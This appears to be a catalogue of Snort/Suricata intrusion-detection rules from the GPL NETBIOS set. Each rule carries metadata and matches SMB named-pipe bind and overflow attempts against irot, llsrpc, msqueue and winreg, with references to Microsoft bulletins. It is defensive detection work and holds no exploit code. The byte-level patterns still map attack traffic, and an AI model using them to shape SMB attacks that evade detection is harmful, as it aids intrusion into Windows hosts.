alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103252; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103253

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103253; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103254

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103254; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103255

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103255; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS irot unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103126

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103126; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103127

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103127; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103128

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103128; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103129

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103129; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103110

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103110; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103096

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|llsrpc|00|"; within:8; distance:51; nocase; classtype:protocol-command-decode; sid:2103096; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103111

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103111; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103112

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103112; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103097

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:51; nocase; classtype:protocol-command-decode; sid:2103097; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103113

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103113; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103172

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103172; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103173

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103173; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103174

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103174; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103175

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103175; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : CVE-2003-0995

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103214

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103214; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103215

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103215; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103216

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103216; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103217

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103217; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103196

